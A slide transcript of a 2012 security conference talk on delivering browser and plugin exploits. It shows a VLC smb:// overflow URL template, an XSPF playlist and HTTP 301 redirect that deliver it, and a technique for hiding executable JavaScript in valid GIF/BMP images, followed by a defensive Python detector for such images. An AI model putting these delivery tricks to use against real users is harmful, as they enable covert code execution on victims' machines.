Innovative Exploit Delivery
Behind every successful exploit is a good delivery mechanism. This talk combines my research in exploit writing, browser and PDF exploitation, web hacking and old school data representation techniques, bringing you a slew of creative and innovative tricks and techniques to send exploits successfully to the victim's doorstep.

Never before has the fine art of packaging been more important when it comes to exploit delivery. Advances in HTML standards, newer trends with HTTP, new techniques of consuming web resources and multiple ways of data representation make it possible to come up with tricks like "Javascript chameleons", "shortened exploits", "exploitation by painting" and other creative techniques.

Usage Rights

© All Rights Reserved
  • Yeah, but can you exploit it on latest Linux amd64 with all the new gcc patches, PIE, stack cookies, ASLR, heap protection, etc? No...

    Innovative Exploit Delivery: Presentation Transcript

    • INNOVATIVE EXPLOIT DELIVERY. Saumil Shah, net-square. HITB2012KUL
    • # who am i
      • Saumil Shah, CEO Net-Square.
      • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec.
      • M.S. Computer Science, Purdue University.
      • saumil@net-square.com
      • LinkedIn: saumilshah
      • Twitter: @therealsaumil
    • My area of work: Penetration Testing, Reverse Engineering, Exploit Writing, New Attack Research, Offensive Security, Defense, Conference Speaker, "Eyes and ears open"
    • When two forces combine... Web Hacking and Binary Exploits
    • SNEAKY LETHAL
    • 302, IMG, JS, HTML5
    • VLC smb overflow
      • smb://example.com@0.0.0.0/foo/#{AAAA AAAA....}
      • Classic Stack Overflow.
    • VLC XSPF file
      <?xml version="1.0" encoding="UTF-8"?>
      <playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
        <title>Playlist</title>
        <trackList>
          <track>
            <location>smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}</location>
            <extension application="http://www.videolan.org/vlc/playlist/0">
              <vlc:id>0</vlc:id>
            </extension>
          </track>
        </trackList>
      </playlist>
    • Alpha Encoded Tiny Exploit URL. ZOMFG
    • 100% Pure Alphanum!
    • VLC smb overflow - HTMLized!!
      <embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf" id="vlc" />
    • 301 Redirect from tinyurl
      HTTP/1.1 301 Moved Permanently
      X-Powered-By: PHP/5.2.12
      Location: smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?...}
      Content-type: text/html
      Content-Length: 0
      Connection: close
      Server: TinyURL/1.6
    • Exploits as Images - 1
      • Grayscale encoding (0-255).
      • 1 pixel = 1 character.
      • Perfectly valid image.
      • Decode and Execute!
    • "I'm an evil Javascript" / "I'm an innocent image"
    • <CANVAS>
    • c) no eval()
    • Same Same No Different!
      var a = eval(str);
      a = (new Function(str))();
    • d) IMAJS
    • IMAJS: Seeing is Believing
    • Browser Support for IMAJS-GIF
      Height Width    Browser/Viewer    Image Renders?    Javascript Executes?
      2f 2a 00 00     Firefox           yes               yes
      2f 2a 00 00     Safari            yes               yes
      2f 2a 00 00     IE                no                yes
      2f 2a 00 00     Chrome            yes               yes
      2f 2a 00 00     Preview.app       yes               -
      2f 2a 00 00     XP Image Viewer   no                -
      2f 2a 00 00     Win 7 Preview     yes               -
    • Browser Support for IMAJS-BMP
      Height Width    Browser/Viewer    Image Renders?    Javascript Executes?
      2f 2a 00 00     Firefox           yes               yes
      2f 2a 00 00     Safari            yes               yes
      2f 2a 00 00     IE                yes               yes
      2f 2a 00 00     Chrome            yes               yes
      2f 2a 00 00     Opera             yes               yes
      2f 2a 00 00     Preview.app       yes               -
      2f 2a 00 00     XP Image Viewer   yes               -
      2f 2a 00 00     Win 7 Preview     yes               -
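The IMAJS tables above put the bytes 2f 2a 00 00 in the image's dimension field; read as ASCII those bytes are "/*", so a JavaScript engine treats the binary image body that follows as one block comment. The header check below is an added example, not code from the talk: it parses only the fixed GIF and BMP headers and flags files whose dimension fields spell "/*". The sample headers are constructed; no image body is needed for the check.

```python
"""Flag GIF/BMP files whose dimension fields spell the JavaScript comment
opener "/*", the IMAJS layout shown in the slides' support tables.
Added example, not the speaker's code; all sample headers are constructed."""
import struct

JS_COMMENT_OPEN = b"/*"  # the bytes 2f 2a


def inspect_image(data: bytes) -> dict:
    """Parse only the fixed header and report the dimension fields.

    GIF: logical screen width/height are two little-endian uint16 at offset 6.
    BMP: BITMAPINFOHEADER width/height are two little-endian int32 at offset 18.
    """
    if data[:6] in (b"GIF87a", b"GIF89a") and len(data) >= 10:
        fmt = "gif"
        width, height = struct.unpack_from("<HH", data, 6)
        raw_fields = (data[6:8], data[8:10])
    elif data[:2] == b"BM" and len(data) >= 26:
        fmt = "bmp"
        width, height = struct.unpack_from("<ii", data, 18)
        raw_fields = (data[18:22], data[22:26])
    else:
        return {"format": None, "width": None, "height": None, "flagged": False}
    # A dimension field that begins with "/*" is the polyglot tell: the same
    # bytes that size the picture open a JS block comment over the image data.
    flagged = any(f.startswith(JS_COMMENT_OPEN) for f in raw_fields)
    return {"format": fmt, "width": width, "height": height, "flagged": flagged}


# Constructed sample headers: a plain 320x200 image of each type, and one
# of each whose dimension field carries the 2f 2a 00 00 bytes from the tables.
BENIGN_GIF = b"GIF89a" + struct.pack("<HH", 320, 200) + b"\x00\x00\x00"
IMAJS_GIF = b"GIF89a" + b"\x2f\x2a\x00\x00" + b"\x00\x00\x00"
_BMP_PREFIX = b"BM" + struct.pack("<IHHI", 1000, 0, 0, 54) + struct.pack("<I", 40)
BENIGN_BMP = _BMP_PREFIX + struct.pack("<ii", 320, 200)
IMAJS_BMP = _BMP_PREFIX + b"\x2f\x2a\x00\x00" + struct.pack("<i", 200)

if __name__ == "__main__":
    for name, blob in [("benign.gif", BENIGN_GIF), ("imajs.gif", IMAJS_GIF),
                       ("benign.bmp", BENIGN_BMP), ("imajs.bmp", IMAJS_BMP)]:
        print(name, inspect_image(blob))
```

The decoded dimensions give a second signal: the 2f 2a 00 00 field reads as a width of 10799 with a height of 0 in a GIF, which no legitimate encoder produces.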
    • e) The αq exploit
    • Encode using Alpha channel
    • Demo IMAJS αq FTW!
    • f) ONE LAST DEMO!!!
    • The FUTURE? HTML5 Video, SVG, WebGL, Mobile Browsers
    • KTHXBAI. See you in 2013?? saumil@net-square.com | @therealsaumil